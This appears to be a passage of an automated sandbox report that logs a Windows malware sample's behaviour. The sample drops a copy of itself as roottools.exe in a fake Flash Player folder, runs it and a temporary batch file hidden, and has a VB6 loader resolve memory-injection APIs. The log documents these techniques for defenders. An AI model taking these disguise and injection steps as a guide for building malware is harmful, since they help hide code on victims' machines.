| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\iuoldw.exe, type = size, size_out = 196608 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Roaming\iuoldw.exe, size = 196608, size_out = 196608 |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Write | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, size = 196608 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77270000 |
|
1 | |
| File | Create | filename = \??\C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, desired_access = FILE_WRITE_EA, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming, type = time |
|
1 | |
| System | Get Time | type = System Time, time = 2018-01-10 18:52:49 (UTC) |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, desired_access = FILE_WRITE_ATTRIBUTES, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys, desired_access = FILE_WRITE_ATTRIBUTES, share_mode = FILE_SHARE_READ |
|
1 | |
| System | Get Time | type = System Time, time = 2018-01-10 18:52:49 (UTC) |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.hin, desired_access = FILE_WRITE_ATTRIBUTES, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys, desired_access = FILE_WRITE_ATTRIBUTES, share_mode = FILE_SHARE_READ |
|
1 | |
| System | Get Time | type = System Time, time = 2018-01-10 18:52:49 (UTC) |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, desired_access = FILE_WRITE_ATTRIBUTES, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys, desired_access = FILE_WRITE_ATTRIBUTES, share_mode = FILE_SHARE_READ |
|
1 | |
| System | Get Time | type = System Time, time = 2018-01-10 18:52:49 (UTC) |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\Microsoft OneDrive.rig, desired_access = FILE_WRITE_ATTRIBUTES, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys, desired_access = FILE_WRITE_ATTRIBUTES, share_mode = FILE_SHARE_READ |
|
1 | |
| Process | Create | process_name = "C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe", os_pid = 0x7a8, creation_flags = CREATE_DEFAULT_ERROR_MODE, show_window = SW_HIDE |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| Mutex | Release | mutex_name = 9B4D68961731FE3C22DA08B640799EB6 |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Local\Temp\updaa5900b0.bat, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
2 | |
| File | Write | filename = C:\Users\aETAdzjz\AppData\Local\Temp\updaa5900b0.bat, size = 200 |
|
1 | |
| Environment | Get Environment String | name = ComSpec, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Process | Create | process_name = "C:\Windows\system32\cmd.exe" /c "C:\Users\aETAdzjz\AppData\Local\Temp\updaa5900b0.bat", os_pid = 0x7f0, creation_flags = CREATE_DEFAULT_ERROR_MODE, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 |
| Information | Value |
|---|---|
| ID | #7 |
| File Name | c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe |
| Command Line | "C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe" |
| Initial Working Directory | C:\Users\aETAdzjz\AppData\Roaming\ |
| Monitor | Start Time: 00:01:23, Reason: Child Process |
| Unmonitor | End Time: 00:10:13, Reason: Terminated by Timeout |
| Monitor Duration | 00:08:50 |
| Information | Value |
|---|---|
| PID | 0x7a8 |
| Parent PID | 0x65c (c:\users\aetadzjz\appdata\roaming\iuoldw.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
97C
0x
980
0x
24C
0x
184
|
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsTNT, address_out = 0x0 |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_INPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_ERROR_HANDLE |
|
1 | |
| File | Get Info | filename = STD_ERROR_HANDLE, type = file_type |
|
1 | |
| Module | Get Filename | process_name = c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, size = 260 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x75a05235 |
|
1 | |
| Mutex | Create | - |
|
1 | |
| Module | Get Handle | module_name = c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe, base_address = 0x400000 |
|
1 | |
| Module | Get Filename | process_name = c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe, file_name_orig = C:\Windows\system32\MSVBVM60.DLL, size = 260 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Filename | process_name = c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe, file_name_orig = C:\Windows\system32\MSVBVM60.DLL, size = 260 |
|
1 | |
| Module | Get Filename | module_name = c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe, process_name = c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, size = 260 |
|
1 | |
| Module | Get Filename | process_name = c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe, file_name_orig = C:\Windows\system32\MSVBVM60.DLL, size = 260 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Load | module_name = OLEAUT32.DLL, base_address = 0x76b60000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = OleLoadPictureEx, address_out = 0x76bc70a1 |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\oleaut32.dll, base_address = 0x76b60000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = DispCallFunc, address_out = 0x76b73dcf |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = LoadTypeLibEx, address_out = 0x76b707b7 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = UnRegisterTypeLib, address_out = 0x76b91ca9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = CreateTypeLib2, address_out = 0x76b78e70 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarDateFromUdate, address_out = 0x76b77684 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarUdateFromDate, address_out = 0x76b7cc98 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = GetAltMonthNames, address_out = 0x76ba903a |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarNumFromParseNum, address_out = 0x76b76231 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarParseNumFromStr, address_out = 0x76b75fea |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromR4, address_out = 0x76b83f94 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromR8, address_out = 0x76b84e9e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromDate, address_out = 0x76badb72 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromI4, address_out = 0x76b92a8c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromCy, address_out = 0x76bad737 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarR4FromDec, address_out = 0x76bae015 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = GetRecordInfoFromTypeInfo, address_out = 0x76bacc3d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = GetRecordInfoFromGuids, address_out = 0x76bad1c4 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayGetRecordInfo, address_out = 0x76bad48c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArraySetRecordInfo, address_out = 0x76bad4c6 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayGetIID, address_out = 0x76bad509 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArraySetIID, address_out = 0x76b7e7bb |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayCopyData, address_out = 0x76b7e496 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayAllocDescriptorEx, address_out = 0x76b7ddf1 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayCreateEx, address_out = 0x76bad53f |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormat, address_out = 0x76bb2055 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormatDateTime, address_out = 0x76bb20ea |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormatNumber, address_out = 0x76bb2151 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormatPercent, address_out = 0x76bb21f5 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormatCurrency, address_out = 0x76bb2288 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarWeekdayName, address_out = 0x76bb2335 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarMonthName, address_out = 0x76bb23d5 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarAdd, address_out = 0x76b85934 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarAnd, address_out = 0x76b85a98 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarCat, address_out = 0x76b859b4 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarDiv, address_out = 0x76bde405 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarEqv, address_out = 0x76bdef07 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarIdiv, address_out = 0x76bdf00a |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarImp, address_out = 0x76bdef47 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarMod, address_out = 0x76bdf15e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarMul, address_out = 0x76bddbd4 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarOr, address_out = 0x76bdecfa |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarPow, address_out = 0x76bdea66 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarSub, address_out = 0x76bdd332 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarXor, address_out = 0x76bdee2e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarAbs, address_out = 0x76bdca11 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarFix, address_out = 0x76bdcc5f |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarInt, address_out = 0x76bdcde7 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarNeg, address_out = 0x76bdc802 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarNot, address_out = 0x76bdec66 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarRound, address_out = 0x76bdd155 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarCmp, address_out = 0x76b7b0dc |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecAdd, address_out = 0x76b95f3e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecCmp, address_out = 0x76b84fd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarBstrCat, address_out = 0x76b80d2c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarCyMulI4, address_out = 0x76b959ed |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarBstrCmp, address_out = 0x76b6f8b8 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ole32.dll, base_address = 0x75450000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CoCreateInstanceEx, address_out = 0x75499d4e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CLSIDFromProgIDEx, address_out = 0x75460782 |
|
1 | |
| Module | Get Filename | process_name = c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, size = 260 |
|
2 | |
| Module | Load | module_name = SXS.DLL, base_address = 0x74940000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\sxs.dll, function = SxsOleAut32MapIIDOrCLSIDToTypeLibrary, address_out = 0x74987685 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\user32.dll, base_address = 0x75790000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetSystemMetrics, address_out = 0x757a7d2f |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = MonitorFromWindow, address_out = 0x757b3150 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = MonitorFromRect, address_out = 0x757ce7a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = MonitorFromPoint, address_out = 0x757b5281 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = EnumDisplayMonitors, address_out = 0x757b451a |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetMonitorInfoA, address_out = 0x757b4413 |
|
1 | |
| Window | Create | class_name = ThunderRT6Main, wndproc_parameter = 0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VBA\Monitors |
|
1 | |
| Window | Create | class_name = VBMsoStdCompMgr, wndproc_parameter = 0 |
|
1 | |
| Window | Set Attribute | class_name = VBMsoStdCompMgr, index = 0, new_long = 5513372 |
|
1 | |
| Window | Create | class_name = VBFocusRT6, wndproc_parameter = 0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VBA\Monitors |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Keyboard | Get Info | type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721 |
|
1 | |
| Window | Create | window_name = Langskallet7, wndproc_parameter = 0 |
|
1 | |
| Module | Load | module_name = KERNEL32 , base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ReadProcessMemory, address_out = 0x75a1cfcc |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = EnumResourceTypesA, address_out = 0x75a80efd |
|
1 | |
| Module | Load | module_name = shell32, base_address = 0x75c50000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = Shell_NotifyIconA, address_out = 0x75e98af2 |
|
1 | |
| Module | Load | module_name = NTDLL, base_address = 0x77270000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = ZwSetInformationProcess, address_out = 0x7728fb18 |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x75a010ff |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x75790000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetDesktopWindow, address_out = 0x757b0a19 |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x7729e026 |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x75a011a9 |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetErrorMode, address_out = 0x75a01b00 |
|
1 | |
| Module | Load | module_name = ntdll, base_address = 0x77270000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = NtYieldExecution, address_out = 0x7728ff2c |
|
1 | |
| System | Sleep | duration = 15 milliseconds (0.015 seconds) |
|
32 | |
| System | Sleep | duration = 8000 milliseconds (8.000 seconds) |
|
1 | |
| Module | Load | module_name = ntdll, base_address = 0x77270000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = NtProtectVirtualMemory, address_out = 0x77290028 |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileA, address_out = 0x75a053c6 |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x75a01282 |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x75a01410 |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x75a03ed3 |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileSize, address_out = 0x75a0196e |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = UnmapViewOfFile, address_out = 0x75a01826 |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtectEx, address_out = 0x75a845bf |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetLongPathNameA, address_out = 0x75a8437f |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x75a1d802 |
|
1 | |
| Module | Load | module_name = IPHlpApi, base_address = 0x74920000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\iphlpapi.dll, function = GetAdaptersInfo, address_out = 0x74929263 |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAllocEx, address_out = 0x75a1d9b0 |
|
1 | |
| Module | Load | module_name = shell32, base_address = 0x75c50000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteA, address_out = 0x75e97078 |
|
1 | |
| Module | Load | module_name = User32, base_address = 0x75790000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = EnumWindows, address_out = 0x757ad1cf |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x75790000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = DestroyWindow, address_out = 0x757a9a55 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x75790000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = EnumThreadWindows, address_out = 0x757b3961 |
|
1 | |
| Module | Unmap | process_name = c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = TerminateThread, address_out = 0x75a07a2f |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x75a049d7 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DeleteFileW, address_out = 0x75a089b3 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x772b1f6e |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetNativeSystemInfo, address_out = 0x75a110b5 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateThread, address_out = 0x75a034d5 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x7729e026 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapDestroy, address_out = 0x75a035b7 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAllocEx, address_out = 0x75a1d9b0 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LocalFree, address_out = 0x75a02d3c |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x772a45f5 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetComputerNameW, address_out = 0x75a0dd0e |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x75a014e9 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SystemTimeToFileTime, address_out = 0x75a05a7e |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GlobalMemoryStatusEx, address_out = 0x75a2d4c4 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessW, address_out = 0x75a0103d |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x75a0170d |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedIncrement, address_out = 0x75a01400 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTime, address_out = 0x75a05a96 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFreeEx, address_out = 0x75a1d9c8 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsBadReadPtr, address_out = 0x75a2d075 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiW, address_out = 0x75a1d5cd |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = OpenMutexW, address_out = 0x75a05151 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetEndOfFile, address_out = 0x75a1ce2e |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThread, address_out = 0x75a017ec |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x75a0469b |
|
1 | |
